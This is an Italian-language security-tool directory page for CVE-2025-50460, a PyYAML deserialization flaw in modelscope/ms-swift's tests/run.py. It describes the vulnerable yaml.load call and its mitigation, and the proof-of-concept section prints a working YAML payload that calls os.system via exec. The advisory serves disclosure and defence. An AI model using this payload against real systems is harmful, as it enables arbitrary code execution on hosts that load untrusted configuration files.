Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-50460 — Dettagli tecnici e exploit per CVE-2025-50460 | Kitploit
Strumenti/GitHubGitHub/anchor0221/cve-2025-50460
Analisi StaticaAnalisi delle VulnerabilitàAnalisi del CodiceExploitPaper e RicercaApprendimento e Formazione
GitHubanchor0221/cve-2025-50460

CVE-2025-50460

Dettagli tecnici e exploit per CVE-2025-50460

Vedi Repository
31 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-50460: Esecuzione di codice remoto in modelscope/ms-swift tramite deserializzazione non sicura di PyYAML

Stato: In attesa di analisi
Questo record CVE è stato segnato per gli sforzi di arricchimento NVD.

Esiste una vulnerabilità di esecuzione di codice remoto (RCE) nel progetto ms-swift versione 3.3.0 a causa di una deserializzazione non sicura in tests/run.py utilizzando yaml.load() dalla libreria PyYAML (versioni = 5.3.1). Se un attaccante può controllare il contenuto del file di configurazione YAML passato al parametro --run_config, è possibile eseguire codice arbitrario durante la deserializzazione. Ciò può portare a un compromesso completo del sistema. La vulnerabilità viene attivata quando viene caricato un file YAML dannoso, consentendo l'esecuzione di comandi Python arbitrari come os.system(). Si consiglia di aggiornare PyYAML alla versione 5.4 o superiore e di utilizzare yaml.safe_load() per mitigare il problema.

Descrizione

Esiste una vulnerabilità di esecuzione di codice remoto (RCE) nel progetto modelscope/ms-swift a causa dell'uso non sicuro di yaml.load() in combinazione con versioni vulnerabili della libreria PyYAML (≤ 5.3.1). Il problema risiede nello script tests/run.py, dove un file di configurazione YAML fornito dall'utente viene deserializzato utilizzando yaml.load() con yaml.FullLoader.

Scarica lo strumento

Se un attaccante può controllare o sostituire il file di configurazione YAML fornito all'argomento --run_config, può iniettare un payload dannoso che provoca l'esecuzione di codice arbitrario.

Repository Affetto

  • Progetto: modelscope/ms-swift
  • Versioni affette: ultima
  • File: tests/run.py
  • Permalink GitHub: https://github.com/modelscope/ms-swift/blob/e02ebfdf34f979bbdba9d935acc1689f8d227b38/tests/run.py#L420
  • Dipendenza: PyYAML <= 5.3.1

Codice Vulnerabile

root@kitploit:~
if args.run_config is not None and Path(args.run_config).exists():
    with open(args.run_config, encoding='utf-8') as f:
        run_config = yaml.load(f, Loader=yaml.FullLoader)

Prova di Concetto (PoC)

Passo 1: Creare un file YAML dannoso (exploit.yaml)

root@kitploit:~
!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('mkdir HACKED')"

Passo 2: Eseguire con PyYAML vulnerabile (<= 5.3.1)

root@kitploit:~
import yaml

with open("exploit.yaml", "r") as f:
    cfg = yaml.load(f, Loader=yaml.FullLoader)

Ciò comporta l'esecuzione di os.system, dimostrando l'esecuzione di codice.

Mitigazione

  • Sostituire yaml.load() con yaml.safe_load()
  • Aggiornare PyYAML alla versione 5.4 o successiva

Esempio di correzione:

root@kitploit:~
# Prima
yaml.load(f, Loader=yaml.FullLoader)

# Dopo
yaml.safe_load(f)

Stato CVE

CampoValore
ID CVECVE-2025-50460
Punteggio CVSSDa determinare
CWECWE-502: Deserializzazione di dati non affidabili
Data di segnalazione2025-04-25
Data di divulgazione2025-07-30
Versione affettaultima
Versione corretta

Autore

  • Scoperto da: Yu Rong (戎誉) e Hao Fan (凡浩)
  • Contatto: [[email protected] ]